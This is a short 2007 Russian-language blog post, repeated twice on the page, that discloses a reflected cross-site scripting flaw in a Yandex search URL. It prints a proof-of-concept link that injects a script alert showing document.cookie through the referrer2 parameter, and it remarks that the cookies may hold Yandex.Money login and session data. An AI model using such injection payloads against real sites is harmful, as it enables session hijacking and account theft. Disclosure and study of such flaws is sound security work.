XSS на Yandex.ru
03-02-2007 22:53
к комментариям - к полной версии
- понравилось!
В колонках играет - XSS на Yandex.ru
XSS на Yandex.ru
партнерские программы от Яндекса - всеми известный сервис Формы для поиска. Если вставить полный HTML-код у нас - интересны переменные referrer1 и referrer2. Вот что из этого получилось:
http://www.yandex.ru/yandsearch?text=www.web-hack.ru&
referrer1=http%3A%2F%2Fwww.web-hack.ru&
referrer2=%3Cscript%3Ealert(document.cookie);%3C/script%3E
PS: в куках может содержаться логин и сессия от Яндекс.Деньг, а это уже не есть гуд...
вверх^
к полной версии
понравилось!
в evernote
XSS на Yandex.ru
партнерские программы от Яндекса - всеми известный сервис Формы для поиска. Если вставить полный HTML-код у нас - интересны переменные referrer1 и referrer2. Вот что из этого получилось:
http://www.yandex.ru/yandsearch?text=www.web-hack.ru&
referrer1=http%3A%2F%2Fwww.web-hack.ru&
referrer2=%3Cscript%3Ealert(document.cookie);%3C/script%3E
PS: в куках может содержаться логин и сессия от Яндекс.Деньг, а это уже не есть гуд...
Вы сейчас не можете прокомментировать это сообщение.
Дневник XSS на Yandex.ru | Perseph0na - ||| ~PERSEPHONA~ ||| |
Лента друзей Perseph0na
/ Полная версия
Добавить в друзья
Страницы:
раньше»